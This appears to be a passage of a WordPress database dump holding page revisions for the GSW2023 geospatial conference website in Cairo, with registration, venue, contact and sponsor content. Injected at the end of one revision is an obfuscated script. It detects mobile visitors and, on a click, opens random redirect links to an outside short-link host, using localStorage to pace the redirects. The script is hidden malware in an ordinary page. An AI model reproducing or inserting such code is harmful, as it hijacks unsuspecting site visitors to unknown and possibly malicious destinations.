width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h5>\r\n[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n&nbsp;\r\n<h3></h3>\r\n[/vc_column_text][vc_column_text css=\".vc_custom_1682772322645{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023,at the InterContinental Cairo Semiramis,Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-17 04:56:21','2023-05-17 04:56:21','',3066,'https://gsw2023.com/?p=4518',0,'revision','',0),
(4520,1,'2023-05-17 05:02:57','2023-05-17 05:02:57','[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684272005765{margin-top: -25px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"300\" height=\"124\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\r\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\r\n[/vc_column_text][/vc_column_inner]\r\n\r\n[vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\" css=\".vc_custom_1684297727133{margin-top: 25px !important;}\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3287|url^https://gsw2023.com/wp-content/uploads/2022/11/intercontinental-cairo-7836282477-2x1-1.jpg|caption^null|alt^null|title^intercontinental-cairo-7836282477-2x1|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\"][vc_column][ultimate_heading main_heading=\"BOOK YOUR HOTEL NOW\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\" margin_design_tab_text=\"\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #000080;\"><strong><a style=\"color: #000080;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue </a></strong></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000080; font-size: 24pt;\"><strong>(InterContinental Cairo Semiramis)</strong></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #000080;\"><strong><a style=\"color: #000080;\" 